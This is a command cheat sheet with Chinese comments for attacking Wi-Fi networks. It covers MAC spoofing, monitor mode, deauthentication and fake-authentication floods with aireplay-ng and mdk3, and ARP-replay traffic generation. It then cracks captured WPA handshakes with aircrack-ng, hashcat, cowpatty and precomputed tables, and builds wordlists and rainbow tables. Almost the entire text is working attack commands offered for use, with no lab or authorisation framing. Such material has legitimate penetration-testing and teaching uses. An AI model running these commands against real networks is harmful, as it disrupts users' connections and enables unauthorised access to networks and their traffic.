Aircrack

iwconfig  # 查看有无无线网卡
macchanger --mac 00:11:22:33:44:55 wlan0  # 更改mac地址
ifconfig wlan0 up  # 激活无线网卡
airmon-ng start wlan0  # 将网卡设为monitor模式,之后使用mon0替代名称wlan0
airodump-ng mon0 -t wpa  # 查看附近的无线网络,需要记录下MAC和Channel,MB列后面有个点'54e.'即是开启了wps功能!
airodump-ng -ivs -w file -c 6 --bssid MAC mon0 # 只捕获ivs数据包并保存到文件file,-c:ap的工作频段
aireplay-ng -0 1 -a AP_MAC -c Client_MAC mon0  # deauth攻击1次,迫使有效客户断开重新申请验证以截获该重要数据!
aireplay-ng -1 0 -e SSID -a BSSID -h AP_MAC mon0  # -1:表示伪验证,0表示重新验证时间.在无客户端连接情况下使用这两个
aireplay-ng -3 -b AP_MAC -h Client_MAC mon0  # 进行arprequest攻击,以加快有效数据包的生成!
aircrack-ng -w wordlist xx.cap/xxx.ivs  # 破解捕获到的cap或ivs文件,-w:字典文件;也可以基于hashtable破解,见cowplay
mdk3  # Authentication攻击
airmon-ng wlan0 up  # 将网卡设为monitor模式
mdk3 mon0 a -a AP_MAC -s 40  # a:Authentication攻击模式,-a:AP的物理地址,-s:发送数据包的速率可以不填
mdk3 mon0 d -c 1  # d:Deauthentication攻击(客户端得不到验证),-c:信道,发送速率根据网卡的性能一般在15-200/s

# hashcat [options] hashfile [mask|wordlists|directories]
hashcat --hash-type 2500 --attack-mode 0 demo.hccap dict1.txt dict2.txt
hashcat -m 2500 -a 3 --pw-min 6 --pw-max 8 demo.hccap pengbo?l?l  # 6-8小写字母,知道了前六位
cudahashcat -m 2500 -a 3 demo.hccap demo.hcmask  # 貌似只支持cudahashcat
# --gpu-accel  16
# --gpu-loops  256
# --segment-size 512

cowpatty -d file.hash -r file.cap -s SSID
aircrack-ng -r my.hash 123.cap

airolib-ng  # 先构建hashtable,增加破解速度,但生成速度很慢
airolib-ng my --import essid ssid.txt  # 里面存放待破解的无线SSID
airolib-ng my --import passwd wordlist.txt  # 很慢
airolib-ng my --clean all
airolib-ng my --batch

# linux上声称wpahash工具,属于cowpatty,需先安装libcap
genpmk -f wordlist.txt -d hashfile.hash -s ssid

# hashtable生成器
# hashtable: https://www.freerainbowtables.com/
rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index
rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0
rtsort *.rt

# 该密码生成工具语法类似于hashcat,Build-inCharset: ?l ?u ?d ?s ?a
# -o  output file
# -i   enable increment mode,如 -i 4:8 表示构建4-8位密码
# -1  同-2 -3 -4,自定义字符集
mp [options] mask
mp32.exe pass?d?d  pass00-pass99